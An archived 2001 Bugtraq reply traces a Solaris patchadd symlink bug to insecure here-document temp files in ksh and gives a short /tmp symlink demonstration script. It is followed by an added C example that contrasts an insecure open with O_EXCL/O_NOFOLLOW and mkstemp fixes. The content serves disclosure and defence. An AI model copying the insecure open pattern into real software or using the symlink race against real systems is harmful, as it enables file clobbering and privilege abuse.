Re: Solaris Patchadd symlink exploit.

From: Paul Szabo (psz@maths.usyd.edu.au)
Date: 08/27/01


Date: Tue, 28 Aug 2001 07:06:08 +1000 (EST)
From: psz@maths.usyd.edu.au (Paul Szabo)
Message-Id: <200108272106.f7RL68V400699@milan.maths.usyd.edu.au>
To: bugtraq@securityfocus.com, lwc@Vapid.dhs.org
Subject: Re:  Solaris Patchadd symlink exploit.


> Here is an exploit to an old bug for patchadd in Solaris. ...
> #See BID http://www.securityfocus.com/bid/2127

The bug is not in the patchadd script, but in the Korn shell ksh that
creates "here documents" insecurely.

Demonstration (ksh is vulnerable if the size of silly.1 is changed):

#!/bin/ksh -x
touch /tmp/silly.1
ln -s /tmp/silly.1 /tmp/sh$$.1
ls -l /tmp/silly.* /tmp/sh$$.*
cat <<EOF
Just some short text
EOF
ls -l /tmp/silly.* /tmp/sh$$.*
rm /tmp/silly.* /tmp/sh$$.*

Note that there is a similar bug in the Bourne shell sh. For a historical
perspective see articles:

http://www.securityfocus.com/templates/archive.pike?list=1&msg=200011230225.NAA19716@milan.maths.usyd.edu.au
http://www.securityfocus.com/templates/archive.pike?list=1&msg=200012190800.TAA05385@milan.maths.usyd.edu.au
http://www.securityfocus.com/templates/archive.pike?list=1&msg=200012202213.JAA03182@milan.maths.usyd.edu.au
http://www.securityfocus.com/templates/archive.pike?list=1&msg=200012202211.JAA25620@milan.maths.usyd.edu.au

Cheers,

Paul Szabo - psz@maths.usyd.edu.au http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics University of Sydney 2006 Australia
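The following is an added example, not code from Paul Szabo's post and not the ksh or sh source: it puts the insecure temp-file pattern the post describes (a predictable name under /tmp opened with O_CREAT, so a pre-planted symlink redirects the write) beside the hardened pattern a shell should use for here-documents (O_CREAT|O_EXCL|O_NOFOLLOW on a fixed name, or better an unpredictable name from mkstemp()). It assumes a POSIX system with a writable /tmp; the sandbox directory and the file names silly.1 and sh1234.1 are constructed here to mirror the post's /tmp/silly.1 and /tmp/sh$$.1.

```c
/* Added example (not from the original post): insecure vs. hardened creation
 * of a here-document temp file, run against a pre-planted symlink in a
 * private sandbox directory. Names and paths are constructed for the demo. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Insecure pattern: predictable name, O_CREAT without O_EXCL. If the path is
 * already a symlink, the open follows it and truncates whatever it points to. */
static int open_heredoc_insecure(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
}

/* Hardened pattern for a fixed name: O_EXCL fails (EEXIST) on any existing
 * path, symlinks included per POSIX, and O_NOFOLLOW refuses a symlink outright. */
static int open_heredoc_secure(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Runs both openers against a planted symlink. Returns a bitmask:
 *   bit 0: the insecure open wrote through the link into the target file
 *   bit 1: the hardened open refused with EEXIST or ELOOP
 *   bit 2: mkstemp() produced a fresh regular file under a random name
 * Returns -1 if the sandbox could not be set up. */
int heredoc_symlink_demo(void) {
    char dir[] = "/tmp/heredoc-demo-XXXXXX";            /* constructed sandbox */
    if (mkdtemp(dir) == NULL) return -1;

    char target[PATH_MAX], link[PATH_MAX], tmpl[PATH_MAX];
    snprintf(target, sizeof target, "%s/silly.1", dir);   /* like /tmp/silly.1 */
    snprintf(link, sizeof link, "%s/sh1234.1", dir);      /* like /tmp/sh$$.1 */
    snprintf(tmpl, sizeof tmpl, "%s/sh.XXXXXX", dir);     /* mkstemp template */

    int tfd = open(target, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (tfd < 0) { rmdir(dir); return -1; }
    close(tfd);
    if (symlink(target, link) != 0) { unlink(target); rmdir(dir); return -1; }

    const char *text = "Just some short text\n";   /* the post's here-doc body */
    size_t len = strlen(text);
    struct stat st;
    int result = 0;

    /* Insecure: the open follows the link, so the bytes land in silly.1. */
    int fd = open_heredoc_insecure(link);
    if (fd >= 0) {
        ssize_t w = write(fd, text, len);
        close(fd);
        if (w == (ssize_t)len && stat(target, &st) == 0 && st.st_size == (off_t)len)
            result |= 1;
    }

    /* Hardened: the same path is refused instead of followed. */
    fd = open_heredoc_secure(link);
    if (fd < 0 && (errno == EEXIST || errno == ELOOP)) result |= 2;
    else if (fd >= 0) close(fd);

    /* Best: an unpredictable name; mkstemp() uses O_CREAT|O_EXCL internally. */
    fd = mkstemp(tmpl);
    if (fd >= 0) {
        if (lstat(tmpl, &st) == 0 && S_ISREG(st.st_mode)) result |= 4;
        close(fd);
        unlink(tmpl);
    }

    unlink(link);
    unlink(target);
    rmdir(dir);
    return result;
}

int main(void) {
    int r = heredoc_symlink_demo();
    printf("insecure followed link: %d, hardened refused: %d, mkstemp ok: %d\n",
           r & 1, (r >> 1) & 1, (r >> 2) & 1);
    return r == 7 ? 0 : 1;
}
```

Compile with `cc -o heredoc_demo heredoc_demo.c` and run it; a result of 7 means the insecure open wrote through the planted link while both hardened forms did not. The fixed-name variant only closes the symlink hole; the random name from mkstemp() also removes the predictable `sh$$.N` target the post's demonstration relies on.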